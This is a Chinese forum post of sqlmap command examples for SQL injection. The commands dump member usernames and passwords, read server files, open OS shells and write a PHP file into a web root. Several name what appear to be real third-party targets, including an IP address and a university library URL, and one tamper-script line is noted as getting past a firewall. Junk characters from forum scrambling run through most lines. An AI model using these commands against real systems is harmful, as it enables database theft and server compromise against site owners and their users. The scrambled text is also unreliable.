找回密码
 立即注册
查看: 2847|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap. V7 i7 w% C1 [1 _! Q7 O) P
2 }: H/ z9 ]6 j5 ~- y- w; w
update :::::>     in the folder   after  execute    following   order : svn update
& F) z- i/ r2 w3 g: L3 f( c/ }4 J6 F( Y# u
sqlmap.py -r 1.txt --current-db
3 u4 f' C4 W: @0 U1 J
( Z; g: W0 _6 j5 l; O0 lv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”- O: n# c9 ~9 e. n+ D7 G% `' Q+ F, M

$ h* x* \6 H  J- e2 J==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
! E  [, R8 t8 F8 L8 @" N+ u' B猜解数据库! s6 \5 ^% Q/ U0 Q" |
./sqlmap.py -u "injection-url" --dbs
& X* k) `; ?5 P5 q/ Qsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
3 k/ N! o( i0 v4 I9 h0 ^; L4 \
4 S2 F8 Y2 u5 l猜解表名6 C) a4 [0 b' J! w
./sqlmap.py -u "injection-url" -D database_name --tables
% S2 W+ a% {# M3 S9 G/ {9 {: b' z
6 ^2 v% P+ `, D$ c% C5 l; tsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"6 J, B8 S# w( ?& ~$ c
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" / k# ^' K/ e  p1 c
+ n4 o+ I. \4 Z9 y1 o/ ^- J$ I
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump  ^6 f) e0 V2 n! n: v" M) ?

6 e: z! d  G. j2 Nsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"  m1 o$ Y, {( C! ~0 l
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"0 J4 A, X- G6 A) b! x
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
% R7 p/ h7 d9 k' `3 K3 K& ]sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"5 J2 @- Y, B' _! i$ K  s
, ^, M5 Q, @: t% u  Z+ O0 m+ S* O
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
9 A1 \; N* b3 f2 g3 K- w/ M' |sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
  L: s, W% @& E2 @$ _# o' c& hsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"0 G  _% u! N& l# x! j* l9 W+ R
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
" B( _2 p# ^+ [! H- v: c. }sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump' Q# }" n7 N# \, q, i# k' q; x6 W2 O! x
: Z' I) h1 i) T, q7 p" g/ K7 \
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了7 l6 Z" V. z8 ]9 l
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
* z( |; x1 [6 X- h0 q4 l& I- h- U! J8 r
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"1 l2 N2 c" K. H! t  ?1 ^3 L) K  i- B
猜解列名
: `( m  z. Q. M/ M, a' m) w$ c- |./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
4 v2 N" |% @9 P& H6 h, G5 b2 O$ h7 j
+ E* J1 A; |; R; Z' Asqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
) \$ t/ S; g! j- v6 ^( {sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
/ c1 J5 i, x) m. m9 Ksqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
+ }" f& k" ~' q: L2 X) a
+ x) _/ b0 j6 F! f* X  H; R$ Ssqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"$ ]3 k0 q1 g8 T6 {9 W
&submit=Go1 _* p$ x0 S1 _
猜解值
: k- G# A2 h9 i) _' J( T./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
5 G( l# l! h5 {5 L( m3 Z$ U, L========================================================
) Z* Y% d1 G: R搜索表名中包括mana字符的
$ m) l9 E# t! a( p  R6 S/sqlmap.py -u "injection-url" -T mana --search
' N0 M2 x- B/ ?* h. D返回一个交互式sql shell2 R( b1 e! L# ~/ k* `6 [
/sqlmap.py -u "injection-url" --sql-shell* Q2 r) q0 i5 A$ a! @9 D" {
读取指定文件(需权限)
# }; ?+ p, m3 ~. P% H/sqlmap.py -u "injection-url" --file-read "c:\boot.ini". W1 n- p. o7 m. n
查看当前 用户 及 数据库
( b- G( G+ L' f/sqlmap.py -u "injection-url" --current-user --current-db5 p( J0 A  P1 _2 s$ }1 [
本地文件 写入 远程目标绝对路径0 d1 Z& q* E- T9 S( `( Q$ m  F
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径2 G) d$ C/ y4 D  q1 A
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" , f" U6 y) I+ Z2 L

& e- J* ~+ Q2 q) i. y$ msqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
$ J) B# Y$ |7 J  W, L1 U查看某用的权限, a: [$ }0 p' x( u4 ^9 R% t4 S
/sqlmap.py -u "injection-url" --privileges -U root
' l) c! z. Q' _+ \  V  w7 q) T查看当前用户是否为dba. T/ C6 ?5 v4 m
/sqlmap.py -u "injection-url" --is-dba
5 G. Q3 E' _6 o  V5 D# g! j读取所有数据库用户或指定数据库用户的密码8 n9 z' ~" m; {. C
sqlmap.py -r 1.txt --users --passwords( C* q9 u2 z7 T; x+ ]
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
( I' L& ?4 L9 ?9 ]* X7 p+ p( y. x9 F+ ^4 z3 r3 K2 b) @) x/ g& i
/sqlmap.py -u "injection-url" --passwords -U root
2 ?: {, g- i8 y, w, C" r) b2 R; N( a! U+ d, S( y6 f$ T, [! w
--start&&--stop 与 --first&&--last 的区别
. L" c3 t- E. p' L/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)6 m" g, S! O8 N, m3 i
3 D; R" m5 Y; O7 m
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
! \8 z! n& f; S/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables( @: a- f& s2 v4 w, b. r
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
" W/ x& k9 f! [% \. q7 H8 S" T9 v' t
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
9 m3 K2 _7 l! p3 A/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"/ W0 u$ k5 ^2 L7 b

. S  h5 i$ c! O: @  c/ ~& A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表